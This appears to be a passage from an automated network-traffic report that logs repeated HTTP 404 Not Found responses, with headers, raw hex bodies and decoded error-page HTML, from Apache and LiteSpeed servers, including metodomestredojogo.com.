        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:27:03 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://metodomestredojogo.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 6505Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 52 db 72 1b 47 92 7d 16 bf a2 d4 8e 11 01 1b 7d c3 9d 20 41 c5 8c 2c 6f d8 31 5a 39 24 39 e6 c1 72 30 0a dd 89 ee 22 ab ab da 55 d5 b8 98 c3 8f 99 98 a7 f9 85 7d d5 8f 6d 56 37 6e 04 1b 24 2d 4a 11 bb 08 12 a8 ca ca cc 73 f2 e4 39 7b 1e cb c8 2c 73 20 a9 c9 f8 f9 d1 99 fd 21 9c 8a 64 ec e4 c6 fd db 3b c7 c6 80 c6 e7 47 cf ce 32 30 94 44 29 55 1a cc d8 f9 e5 c3 0f ee d0 d9 c4 05 cd 60 ec cc 18 cc 73 a9 8c 43 22 29 0c 08 cc 9b b3 d8 a4 e3 18 66 2c 02 b7 bc b4 08 13 cc 30 ca 5d 1d 51 0e e3 b0 ec c2 99 b8 22 0a 38 02 2b 39 65 1c 1c 92 2a 98 8e 9d d4 98 5c 8f 7c 3f c9 f2 c4 93 2a f1 17 53 e1 87 55 91 61 86 c3 f9 cf 9f fe 95 30 81 1c 3e fd 5b 12 10 16 5a d1 98 92 17 df 0c db 61 78 4a de 7c fa 8f 91 b1 24 6f 40 1b 05 04 4f 3f c9 44 9e f9 55 f5 d1 ce 00 c7 4a 4e a4 d1 c7 1b fa c7 19 5d b8 2c a3 09 b8 b9 02 3b de 88 53 95 c0 31 f1 b1 70 c3 f9 38 16 da 26 4c c1 44 e9 71 45 fc d8 f7 b1 31 e2 66 25 6c 2c 2f 11 d4 8b 64 b6 57 eb 50 6e 40 09 6a 70 62 bb 0a 0c e4 39 67 11 35 4c 0a 5f 69 fd dd 22 e3 f8 64 c9 8e 9d 1f 00 62 92 53 45 0f 4c 45 5e 28 fa 7b 21 4f f7 d5 ab a7 e2 4f b1 9d ef 3c 99 50 0c a8 58 86 82 7d fa 97 62 52 7f 41 82 f8 6f fb ea 5d a6 3a 52 2c 37 e7 47 73 26 62 39 f7 2e e6 39 64 f2 92 bd 07 63 98 48 34 19 93 6b 67 42 35 fc a2 b8 33 5a 01 7c f4 3f fa da 9b 5b 03 7d f4 cb 85 ea 8f d8 5c c1 47 bf 2c fe e8 87 5d 2f f0 82 8f fe a0 bd 18 b4 3f fa 4e cb 81 85 c1 7a 2f 17 09 5e f4 2c f9 bc 7e 58 58 76 c3 df d7 55 43 3c d9 bb 2c 54 04 ce e8 da 41 b3 a1 b8 65 d9 aa 7f d9 be 5e 91 8f fe 3c 77 99 88 78 11 5b c8 4b 5d 06 ca 62 17 b7 07 38 b7 97 31 e1 5d ea 97 33 50 e3 be d7 f5 42 e7 e6 e6 f4 c8 ff f6 39 f9 90 32 4d a6 8c 03 c1 5f 5a 18 e9 26 20 40 21 78 4c be f5 8f 9e 4f 0b 11 d9 2d 37 58 4b 34 af 67 54 11 d9 d2 2d 38 5d c7 49 d4 80 e6 b5 51 cb f2 cd 8c af 75 91 e7 52 99 0f 48 52 8f a0 65 98 a5 4b b3 7c d4 10 30 27 df 63 e3 a6 37 a3 bc 80 b7 d3 46 f3 e6 54 83 d6 d8 e6 bd 91 0a 15 f3 34 98 1f 71 ee 86 6c fd f4 fe ed 7f 7b 38 28 ee 8f 4d 97 0d d3 6c de a0 24 51 6a e1 6e 6e 36 f0 79 03 31 2c 35 f0 22 1c 55 bd 83 c8 34 82 56 d0 c2 3b 15 33 8a 1b 61 b1 49 b7 d7 14 58 92 9a 26 06 70 6a fe 01 37 da 30 98 1e 34 4f ab 01 2c cb 5f 98 30 9d f6 5f 95 a2 cb 06 78 09 72 b2 eb 44 ee f4 31 ad bd 18 13 9b 2d 35 6e 3c 81 93 28 39 b5 be 14 9b e6 a9 02 53 28 41 8c 07 68 82 65 63 b3 57 94 af 79 bd 7a 84 f1 78 ac 7e 35 bf dd 34 b7 02 17 6b 81 f5 9c 59 f9 31 3b 42 47 39 53 4e 13 67 b4 2a b4 6d 9c 8f 45 3c ec 44 f8 3d 9d 76 3e 16 53 08 a6 1f 8b 76 10 c4 f8 dd a7 83 2a e2 1c 4c 9b dc 4a 6b be 7c 1e 8e 9e df 6e 1b 4f e9 ce b9 e3 ec 3f 55 4d 76 12 9a 2f
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:27:06 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://metodomestredojogo.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 6505Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 52 db 72 1b 47 92 7d 16 bf a2 d4 8e 11 01 1b 7d c3 9d 20 41 c5 8c 2c 6f d8 31 5a 39 24 39 e6 c1 72 30 0a dd 89 ee 22 ab ab da 55 d5 b8 98 c3 8f 99 98 a7 f9 85 7d d5 8f 6d 56 37 6e 04 1b 24 2d 4a 11 bb 08 12 a8 ca ca cc 73 f2 e4 39 7b 1e cb c8 2c 73 20 a9 c9 f8 f9 d1 99 fd 21 9c 8a 64 ec e4 c6 fd db 3b c7 c6 80 c6 e7 47 cf ce 32 30 94 44 29 55 1a cc d8 f9 e5 c3 0f ee d0 d9 c4 05 cd 60 ec cc 18 cc 73 a9 8c 43 22 29 0c 08 cc 9b b3 d8 a4 e3 18 66 2c 02 b7 bc b4 08 13 cc 30 ca 5d 1d 51 0e e3 b0 ec c2 99 b8 22 0a 38 02 2b 39 65 1c 1c 92 2a 98 8e 9d d4 98 5c 8f 7c 3f c9 f2 c4 93 2a f1 17 53 e1 87 55 91 61 86 c3 f9 cf 9f fe 95 30 81 1c 3e fd 5b 12 10 16 5a d1 98 92 17 df 0c db 61 78 4a de 7c fa 8f 91 b1 24 6f 40 1b 05 04 4f 3f c9 44 9e f9 55 f5 d1 ce 00 c7 4a 4e a4 d1 c7 1b fa c7 19 5d b8 2c a3 09 b8 b9 02 3b de 88 53 95 c0 31 f1 b1 70 c3 f9 38 16 da 26 4c c1 44 e9 71 45 fc d8 f7 b1 31 e2 66 25 6c 2c 2f 11 d4 8b 64 b6 57 eb 50 6e 40 09 6a 70 62 bb 0a 0c e4 39 67 11 35 4c 0a 5f 69 fd dd 22 e3 f8 64 c9 8e 9d 1f 00 62 92 53 45 0f 4c 45 5e 28 fa 7b 21 4f f7 d5 ab a7 e2 4f b1 9d ef 3c 99 50 0c a8 58 86 82 7d fa 97 62 52 7f 41 82 f8 6f fb ea 5d a6 3a 52 2c 37 e7 47 73 26 62 39 f7 2e e6 39 64 f2 92 bd 07 63 98 48 34 19 93 6b 67 42 35 fc a2 b8 33 5a 01 7c f4 3f fa da 9b 5b 03 7d f4 cb 85 ea 8f d8 5c c1 47 bf 2c fe e8 87 5d 2f f0 82 8f fe a0 bd 18 b4 3f fa 4e cb 81 85 c1 7a 2f 17 09 5e f4 2c f9 bc 7e 58 58 76 c3 df d7 55 43 3c d9 bb 2c 54 04 ce e8 da 41 b3 a1 b8 65 d9 aa 7f d9 be 5e 91 8f fe 3c 77 99 88 78 11 5b c8 4b 5d 06 ca 62 17 b7 07 38 b7 97 31 e1 5d ea 97 33 50 e3 be d7 f5 42 e7 e6 e6 f4 c8 ff f6 39 f9 90 32 4d a6 8c 03 c1 5f 5a 18 e9 26 20 40 21 78 4c be f5 8f 9e 4f 0b 11 d9 2d 37 58 4b 34 af 67 54 11 d9 d2 2d 38 5d c7 49 d4 80 e6 b5 51 cb f2 cd 8c af 75 91 e7 52 99 0f 48 52 8f a0 65 98 a5 4b b3 7c d4 10 30 27 df 63 e3 a6 37 a3 bc 80 b7 d3 46 f3 e6 54 83 d6 d8 e6 bd 91 0a 15 f3 34 98 1f 71 ee 86 6c fd f4 fe ed 7f 7b 38 28 ee 8f 4d 97 0d d3 6c de a0 24 51 6a e1 6e 6e 36 f0 79 03 31 2c 35 f0 22 1c 55 bd 83 c8 34 82 56 d0 c2 3b 15 33 8a 1b 61 b1 49 b7 d7 14 58 92 9a 26 06 70 6a fe 01 37 da 30 98 1e 34 4f ab 01 2c cb 5f 98 30 9d f6 5f 95 a2 cb 06 78 09 72 b2 eb 44 ee f4 31 ad bd 18 13 9b 2d 35 6e 3c 81 93 28 39 b5 be 14 9b e6 a9 02 53 28 41 8c 07 68 82 65 63 b3 57 94 af 79 bd 7a 84 f1 78 ac 7e 35 bf dd 34 b7 02 17 6b 81 f5 9c 59 f9 31 3b 42 47 39 53 4e 13 67 b4 2a b4 6d 9c 8f 45 3c ec 44 f8 3d 9d 76 3e 16 53 08 a6 1f 8b 76 10 c4 f8 dd a7 83 2a e2 1c 4c 9b dc 4a 6b be 7c 1e 8e 9e df 6e 1b 4f e9 ce b9 e3 ec 3f 55 4d 76 12 9a 2f
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:27:09 GMTServer: ApacheExpires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://metodomestredojogo.com/wp-json/>; rel="https://api.w.org/"Upgrade: h2,h2cConnection: Upgrade, closeVary: Accept-EncodingContent-Encoding: gzipContent-Length: 6505Content-Type: text/html; charset=UTF-8Data Raw: 1f 8b 08 00 00 00 00 00 00 03 d5 52 db 72 1b 47 92 7d 16 bf a2 d4 8e 11 01 1b 7d c3 9d 20 41 c5 8c 2c 6f d8 31 5a 39 24 39 e6 c1 72 30 0a dd 89 ee 22 ab ab da 55 d5 b8 98 c3 8f 99 98 a7 f9 85 7d d5 8f 6d 56 37 6e 04 1b 24 2d 4a 11 bb 08 12 a8 ca ca cc 73 f2 e4 39 7b 1e cb c8 2c 73 20 a9 c9 f8 f9 d1 99 fd 21 9c 8a 64 ec e4 c6 fd db 3b c7 c6 80 c6 e7 47 cf ce 32 30 94 44 29 55 1a cc d8 f9 e5 c3 0f ee d0 d9 c4 05 cd 60 ec cc 18 cc 73 a9 8c 43 22 29 0c 08 cc 9b b3 d8 a4 e3 18 66 2c 02 b7 bc b4 08 13 cc 30 ca 5d 1d 51 0e e3 b0 ec c2 99 b8 22 0a 38 02 2b 39 65 1c 1c 92 2a 98 8e 9d d4 98 5c 8f 7c 3f c9 f2 c4 93 2a f1 17 53 e1 87 55 91 61 86 c3 f9 cf 9f fe 95 30 81 1c 3e fd 5b 12 10 16 5a d1 98 92 17 df 0c db 61 78 4a de 7c fa 8f 91 b1 24 6f 40 1b 05 04 4f 3f c9 44 9e f9 55 f5 d1 ce 00 c7 4a 4e a4 d1 c7 1b fa c7 19 5d b8 2c a3 09 b8 b9 02 3b de 88 53 95 c0 31 f1 b1 70 c3 f9 38 16 da 26 4c c1 44 e9 71 45 fc d8 f7 b1 31 e2 66 25 6c 2c 2f 11 d4 8b 64 b6 57 eb 50 6e 40 09 6a 70 62 bb 0a 0c e4 39 67 11 35 4c 0a 5f 69 fd dd 22 e3 f8 64 c9 8e 9d 1f 00 62 92 53 45 0f 4c 45 5e 28 fa 7b 21 4f f7 d5 ab a7 e2 4f b1 9d ef 3c 99 50 0c a8 58 86 82 7d fa 97 62 52 7f 41 82 f8 6f fb ea 5d a6 3a 52 2c 37 e7 47 73 26 62 39 f7 2e e6 39 64 f2 92 bd 07 63 98 48 34 19 93 6b 67 42 35 fc a2 b8 33 5a 01 7c f4 3f fa da 9b 5b 03 7d f4 cb 85 ea 8f d8 5c c1 47 bf 2c fe e8 87 5d 2f f0 82 8f fe a0 bd 18 b4 3f fa 4e cb 81 85 c1 7a 2f 17 09 5e f4 2c f9 bc 7e 58 58 76 c3 df d7 55 43 3c d9 bb 2c 54 04 ce e8 da 41 b3 a1 b8 65 d9 aa 7f d9 be 5e 91 8f fe 3c 77 99 88 78 11 5b c8 4b 5d 06 ca 62 17 b7 07 38 b7 97 31 e1 5d ea 97 33 50 e3 be d7 f5 42 e7 e6 e6 f4 c8 ff f6 39 f9 90 32 4d a6 8c 03 c1 5f 5a 18 e9 26 20 40 21 78 4c be f5 8f 9e 4f 0b 11 d9 2d 37 58 4b 34 af 67 54 11 d9 d2 2d 38 5d c7 49 d4 80 e6 b5 51 cb f2 cd 8c af 75 91 e7 52 99 0f 48 52 8f a0 65 98 a5 4b b3 7c d4 10 30 27 df 63 e3 a6 37 a3 bc 80 b7 d3 46 f3 e6 54 83 d6 d8 e6 bd 91 0a 15 f3 34 98 1f 71 ee 86 6c fd f4 fe ed 7f 7b 38 28 ee 8f 4d 97 0d d3 6c de a0 24 51 6a e1 6e 6e 36 f0 79 03 31 2c 35 f0 22 1c 55 bd 83 c8 34 82 56 d0 c2 3b 15 33 8a 1b 61 b1 49 b7 d7 14 58 92 9a 26 06 70 6a fe 01 37 da 30 98 1e 34 4f ab 01 2c cb 5f 98 30 9d f6 5f 95 a2 cb 06 78 09 72 b2 eb 44 ee f4 31 ad bd 18 13 9b 2d 35 6e 3c 81 93 28 39 b5 be 14 9b e6 a9 02 53 28 41 8c 07 68 82 65 63 b3 57 94 af 79 bd 7a 84 f1 78 ac 7e 35 bf dd 34 b7 02 17 6b 81 f5 9c 59 f9 31 3b 42 47 39 53 4e 13 67 b4 2a b4 6d 9c 8f 45 3c ec 44 f8 3d 9d 76 3e 16 53 08 a6 1f 8b 76 10 c4 f8 dd a7 83 2a e2 1c 4c 9b dc 4a 6b be 7c 1e 8e 9e df 6e 1b 4f e9 ce b9 e3 ec 3f 55 4d 76 12 9a 2f
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:27:17 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:27:20 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:27:22 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Mon, 04 Dec 2023 14:27:25 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Dec 2023 14:27:30 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><
        Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundConnection: closecache-control: private, no-cache, no-store, must-revalidate, max-age=0pragma: no-cachecontent-type: text/htmlcontent-length: 708date: Mon, 04 Dec 2023 14:27:33 GMTserver: LiteSpeedData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 